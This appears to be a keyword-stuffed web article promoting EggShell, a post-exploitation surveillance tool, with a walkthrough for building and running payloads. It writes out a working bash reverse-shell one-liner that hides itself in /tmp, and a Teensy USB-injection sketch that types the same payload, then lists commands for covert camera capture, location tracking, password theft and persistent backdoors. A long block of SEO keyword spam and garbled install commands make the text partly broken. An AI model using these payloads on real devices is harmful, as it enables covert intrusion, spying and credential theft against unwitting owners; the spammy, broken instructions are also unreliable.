What is EggShell and How to Download It
If you are looking for a powerful and versatile post-exploitation surveillance tool for iOS, macOS, and Linux devices, you might want to check out EggShell. In this article, we will explain what EggShell is, what it can do, and how to download and install it on your machine. We will also show you how to create and execute payloads with EggShell to gain remote access and control over your target devices.
Introduction
What is EggShell?
EggShell is a post-exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell was originally developed as a proof of concept for exploiting iOS devices, but it has since expanded to support macOS and Linux as well. EggShell is based on the Cloud:9ine shell replacement project that circulated from 1999 to around 2002.
eggshell download
What can EggShell do?
EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. You can use EggShell to monitor and manipulate your target devices remotely, as well as perform various pentesting tasks. Some of the features of EggShell include:
SSL encryption for secure communication
Tab completion for easy navigation
Payloads for bash, teensy (USB injection), and iOS
Ability to take pictures from the camera
Ability to track the location of the device
Ability to retrieve passwords from keychains, browsers, wifi, etc.
Ability to execute shell commands and scripts
Ability to upload/download files
Ability to persist on the device
Ability to escalate privileges
Multihandler for managing multiple sessions
How to download and install EggShell
Requirements
To use EggShell, you need to have Python 2.7 installed on your machine. You also need to have a target device that is either iOS (jailbroken), macOS, or Linux. You can use any mobile terminal application or SSH client to connect to your target device.
eggshell python tool download
eggshell remote administration tool download
eggshell ios payload download
eggshell macos payload download
eggshell linux payload download
eggshell sourceforge download
eggshell github download
eggshell cydia source download
eggshell teensy usb injection download
eggshell surveillance tool download
eggshell post exploitation tool download
eggshell command line session download
eggshell file upload download
eggshell file download
eggshell picture taking download
eggshell location tracking download
eggshell shell command execution download
eggshell persistence download
eggshell privilege escalation download
eggshell password retrieval download
eggshell ssl socket connection download
eggshell tab completion download
eggshell multihandler download
eggshell cloud9ine shell replacement download
eggshell script-based toolbar ui download
eggshell windows 2000 xp vista 7 8 download
how to install eggshell on ios
how to install eggshell on macos
how to install eggshell on linux
how to use eggshell on ios
how to use eggshell on macos
how to use eggshell on linux
how to create payloads with eggshell
how to interact with sessions with eggshell
how to take pictures with eggshell
how to track location with eggshell
how to execute shell commands with eggshell
how to retrieve passwords with eggshell
how to escalate privileges with eggshell
how to make persistence with eggshell
what is the difference between cloud9ine and eggShell
what are the features of EggShell
what are the requirements for EggShell
what are the limitations of EggShell
what are the risks of using EggShell
what are the alternatives to EggShell
what are the best practices for using EggShell
what are the legal implications of using EggShell
what are the ethical implications of using EggShell
macOS/Linux installation
To install EggShell on your macOS or Linux machine, you need to clone the GitHub repository and run the eggshell.py script. You can use the following commands in your terminal:
git clone cd eggshell python eggshell.py
This will launch the EggShell command line interface, where you can create and manage your payloads and sessions.
iOS installation (Jailbroken)
To install EggShell on your iOS device, you need to have Cydia installed on your jailbroken device. You can add the following Cydia source:
Then, you can install EggShell 3 from Cydia. After that, you can use any mobile terminal application and run the command eggshell to launch the EggShell command line interface.
How to create and execute payloads with EggShell
Bash payload
A bash payload is a one-liner that establishes an eggshell session upon execution on the target machine. To create a bash payload, you need to select bash from the payload menu in the EggShell command line interface. Then, you need to enter the IP address and port number of your machine, where you will be listening for incoming connections. You can use the following command to find out your IP address:
ifconfig grep inet
After that, you will get a bash payload that looks something like this:
bash && clear && echo "bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" > /tmp/.t && chmod +x /tmp/.t && /tmp/.t && rm /tmp/.t
You need to copy and paste this payload on the target machine and execute it. This will create a reverse shell connection to your machine and start an eggshell session.
Teensy payload (USB injection)
A teensy payload is a script that can be loaded onto a teensy device, which is a small USB development board that can emulate keyboard and mouse input. To create a teensy payload, you need to select teensy from the payload menu in the EggShell command line interface. Then, you need to enter the IP address and port number of your machine, where you will be listening for incoming connections. You will get a teensy payload that looks something like this:
void setup() Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); delay(500); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); Keyboard.print("terminal"); delay(500); Keyboard.set_key1(KEY_RETURN); Keyboard.send_now(); delay(1000); Keyboard.print("bash && clear && echo \"bash -i >& /dev/tcp/192.168.1.10/4444 0>&1\" > /tmp/.t && chmod +x /tmp/.t && /tmp/.t && rm /tmp/.t"); delay(500); Keyboard.set_key1(KEY_RETURN); Keyboard.send_now(); void loop()
You need to copy and paste this payload into the Arduino IDE and upload it to your teensy device. Then, you need to plug the teensy device into the target machine and wait for it to execute the payload. This will create a reverse shell connection to your machine and start an eggshell session.
Interacting with a session
Once you have created and executed a payload on the target machine, you need to start a listener on your machine to receive the incoming connection. You can use the listen command in the EggShell command line interface and enter the port number that you used for your payload. You will see a message like this:
Listening on port 4444... Connection from: 192.168.1.11 EggShell: root#
This means that you have successfully established an eggshell session with the target machine. You can now use various commands to interact with the target machine, such as:
help: shows a list of available commands
ls: lists files and directories in the current working directory
cd: changes the current working directory
cat: displays the contents of a file
download: downloads a file from the target machine to your machine
upload: uploads a file from your machine to the target machine
screenshot: takes a screenshot of the target machine's screen
picture: takes a picture from the target machine's camera
location: shows the location of the target machine on Google Maps
persistence: installs a persistent backdoor on the target machine
passwords: retrieves passwords from keychains, browsers, wifi, etc.
shell: executes a shell command or script on the target machine
exit: closes the current session
Conclusion
Summary of the main points
In this article, we have learned what EggShell is, what it can do, and how to download and install it on our machines. We have also learned how to create and execute payloads with EggShell to gain remote access and control over our target devices. EggShell is a powerful and versatile post-exploitation surveillance tool that can help us monitor and manipulate iOS, macOS, and Linux devices remotely.
<h3 Call to action
If you are interested in learning more about EggShell and how to use it for your pentesting needs, you can visit the official GitHub repository and read the documentation and tutorials. You can also join the EggShell community on Discord and chat with other users and developers. EggShell is an open source project, so you can also contribute to its development and improvement by reporting issues, suggesting features, or submitting pull requests. EggShell is a great tool for ethical hackers and security researchers who want to explore and exploit iOS, macOS, and Linux devices.
FAQs
What is the difference between EggShell and Metasploit?
EggShell and Metasploit are both post-exploitation frameworks that allow you to create and execute payloads on target machines. However, EggShell is more focused on iOS, macOS, and Linux devices, while Metasploit supports a wider range of platforms, including Windows, Android, and web applications. EggShell also has some unique features that Metasploit does not have, such as taking pictures, tracking location, and retrieving passwords.
Is EggShell legal to use?
EggShell is legal to use as long as you have the permission of the owner of the target device or you are using it for educational purposes on your own devices. Using EggShell without permission or for malicious purposes is illegal and unethical, and may result in legal consequences. You should always follow the rules of ethical hacking and respect the privacy and security of others.
How can I protect my devices from EggShell?
To protect your devices from EggShell, you should always keep your operating system and applications updated with the latest security patches. You should also avoid opening suspicious links or attachments from unknown sources, as they may contain EggShell payloads. You should also use strong passwords and encryption for your devices and accounts, and avoid connecting to untrusted networks or USB devices. You should also install a reputable antivirus or firewall software on your devices and scan them regularly for any signs of infection.
Can I use EggShell on non-jailbroken iOS devices?
No, you cannot use EggShell on non-jailbroken iOS devices. Jailbreaking is a process that removes the restrictions and limitations imposed by Apple on iOS devices, allowing you to install unauthorized apps and access system files. Jailbreaking is necessary for using EggShell on iOS devices, as it allows you to run the payload and establish a connection with the attacker's machine. However, jailbreaking also voids your warranty and exposes your device to security risks, so you should do it at your own risk.
Can I use EggShell on Windows devices?
No, you cannot use EggShell on Windows devices. EggShell is designed for iOS, macOS, and Linux devices only. However, there are other post-exploitation tools that you can use for Windows devices, such as Metasploit, Empire, or PowerShell Empire. These tools have similar functionalities as EggShell, but they are compatible with Windows platforms. 44f88ac181
Comments